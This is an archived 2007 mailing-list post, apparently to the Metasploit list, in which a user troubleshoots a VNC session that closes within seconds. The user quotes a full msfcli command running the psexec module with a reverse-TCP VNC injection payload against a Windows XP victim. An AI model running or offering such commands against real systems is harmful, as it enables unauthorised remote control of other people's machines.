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smb_relay and vncinject

From: sigtrap at (sigtrap)
Date: Mon, 10 Sep 2007 15:45:10 +0200

On Gentoo I'm running msf v3.1-dev:
./msfcli windows/smb/psexec DisableCourtesyShell=1 LHOST=
RHOST= PAYLOAD=windows/vncinject/reverse_tcp E

Everything works nice and the vncviewer (I have tried tightvnc and
"normal" vnc) pops up. But after 10-30 seconds the vncviewer closes and
msf tells me:
[*] VNC connection closed.

On the Victim (Windows XP Pro) the system event viewer reports Event ID 7009:
(Service Control Manager) Timeout (30000 ms) waiting for the [Random]
service to connect.

I dont know if the Windows error should be regarded becouse the vncviewer
runs perfectly for a couple of seconds...

Any idees?


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